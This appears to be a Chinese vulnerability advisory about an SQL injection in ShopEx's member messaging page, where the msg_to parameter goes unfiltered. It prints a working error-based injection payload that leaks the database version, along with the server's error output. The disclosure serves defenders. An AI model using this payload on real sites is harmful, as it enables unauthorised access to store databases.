SHOPEX > 4 存在SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 未对客户端可控参数进行安全校验,导致存在SQL注入漏洞; ### 详细说明: http://www.shopex.com/member-sendMsg.html 在处理用户发送信息的时候,msg_to值未进行过滤,导致SQL注入漏洞的产生; 具体利用设置msg_to的值为 ``` ggbond' or 1=(select 1 from (select count(*),concat(floor(rand(0)*2),(select @@version))a from information_schema.tables group by a)b)# ``` 即可爆出数据库版本信息。 ``` Warning: SELECT member_id FROM sdb_members WHERE uname='ggbond' or 1=(select 1 from (select count(*),concat(floor(rand(0)*2),(select @@version))a from information_schema.tables group by a)b)#' LIMIT 0, 1:Duplicate entry '15.1.38-log' for key 'group_key' in /data/htdocs/www/core/include_v5/AloneDB.php on line 58 找不到你填写的用户! ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201209/082300303dd83379aae66e1c33219c55def38319.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/082300303dd83379aae66e1c33219c55def38319.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息